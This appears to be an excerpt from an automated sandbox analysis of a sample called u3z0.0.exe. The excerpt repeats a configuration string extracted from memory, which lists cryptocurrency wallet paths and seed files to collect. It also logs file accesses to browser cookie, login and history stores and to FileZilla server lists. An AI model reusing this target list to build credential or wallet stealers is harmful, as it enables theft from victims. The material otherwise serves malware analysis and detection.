                            Source: u3z0.0.exe, 00000002.00000002.2435497430.00000000043D0000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u3z0.0.exe, 00000002.00000002.2435497430.00000000043D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u3z0.0.exe, 00000002.00000002.2435497430.00000000043D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u3z0.0.exe, 00000002.00000002.2435497430.00000000043D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u3z0.0.exe, 00000002.00000002.2435497430.00000000043D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u3z0.0.exe, 00000002.00000002.2435497430.00000000043D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u3z0.0.exe, 00000002.00000002.2435497430.00000000043D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u3z0.0.exe, 00000002.00000002.2435497430.00000000043D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u3z0.0.exe, 00000002.00000002.2435497430.00000000043D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u3z0.0.exe, 00000002.00000002.2435497430.00000000043D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u3z0.0.exe, 00000002.00000002.2435497430.00000000043D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
